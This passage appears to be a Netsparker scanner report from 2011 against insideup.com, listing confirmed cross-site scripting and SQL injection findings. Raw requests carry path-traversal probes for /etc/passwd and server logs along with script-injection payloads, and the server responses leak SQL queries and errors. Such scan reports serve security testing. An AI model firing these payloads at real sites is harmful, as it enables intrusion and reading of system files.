OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=m0h9ngmh52ho18u7s7imbg61o6; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php'"--></style></script><script>netsparker(0x0005B7)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B7)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/

/ppc/leadflow/inco00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005B5)</script>

Request

GET /ppc/leadflow/inco00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005B5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5q8q07e84mqpqo0b3qb4jd2qc1; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>' OR prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>' OR prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>' OR prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>' OR prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>' OR prj.project_page_url = 'leadflow/inco00/?nsextt='"--></style></script><script>netsparker(0x0005B5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?'"--></style></script><script>alert(0x0005B9..

Parameters

Parameter Type Value
catId GET 30008
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005B9)</script>

Request

GET /ppc/leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kt1nh2u0audhkb31o3i4d9ro62; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>' OR prj.project_page_url = 'leadflow/meac00/project.php?'"--></style></script><script>netsparker(0x0005B9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005B9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005BC)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/meac00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005BC)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 